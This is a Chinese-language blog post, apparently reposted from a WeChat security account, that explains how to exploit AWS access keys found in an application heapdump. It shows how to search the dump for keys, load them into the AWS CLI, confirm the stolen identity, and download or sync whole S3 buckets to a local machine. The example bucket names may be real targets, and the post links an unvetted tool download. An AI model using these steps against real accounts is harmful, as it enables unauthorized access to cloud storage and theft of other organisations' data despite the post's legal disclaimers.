🌟heapdump中aws key利用,使用云资产管理工具不能下载文件怎么办
❝
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请私聊删除。 还在学怎么挖通用漏洞和src吗?快来加入星球-考证请加联系vx咨询
在heapdump中aws亚马逊key利用,使用云资产管理工具不能下载,可使用kali中aws工具可连接并下载文件
解决方式
1、发现heapdump中aws亚马逊key
可直接使用模糊搜索
secretKey,accessKey
2、连接云资产管理工具
连接云资产管理工具后不能下载文件
3、kali连接aws工具解决下载问题
通过kali中aws工具
1、配置 AWS CLI配置 AWS CLI 可以通过运行以下命令,输入你的访问密钥和其他相关信息:命令:aws configure命令执行后,会提示你输入以下信息:AWS Access Key ID: 输入获取的 Access Key ID。AWS Secret Access Key: 输入获取的 Secret Access Key。Default region name: 输入希望使用的 AWS 区域(例如 us-west-2、us-east-1、ap-northeast-1 等)。Default output format: 输出格式。常见的格式有 json、text 或 table,通常选择 json。执行 aws configure 后,可能会像这样输入:AWS Access Key ID [None]: AKIAxxxxxxxxxxxxxxAWS Secret Access Key [None]: wJalrxxxxxxxxxxxxxxDefault region name [None]: us-west-2Default output format [None]: json2、验证配置配置完成后,可以通过运行以下命令验证你的配置:命令:aws sts get-caller-identity这会返回当前 AWS 账户的身份信息,类似如下:{"UserId": "AROAEXAMPLE:role/example","Account": "123456789012","Arn": "arn:aws:sts::123456789012:assumed-role/example"}如果能够成功返回信息,说明已成功连接到 AWS。
可通过aws s3 cp
命令下载单个文件
例如
aws s3 cp s3://bgms-jenkins/arsbiztalk/HELP.md ./HELP.md
命令下载想下载的路径文件
也可通过sync
命令同步文件和目录的内容,既可以是从本地到S3存储桶,也可以是从S3存储桶到本地
aws s3 sync s3://biztalk-chatbot/ ./local-directory
获得工具:
链接:https://pan.quark.cn/s/8208bb8f1aa4
原文始发于微信公众号(不秃头的安全):aws key利用,云资产管理工具不能下载文件怎么办?
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论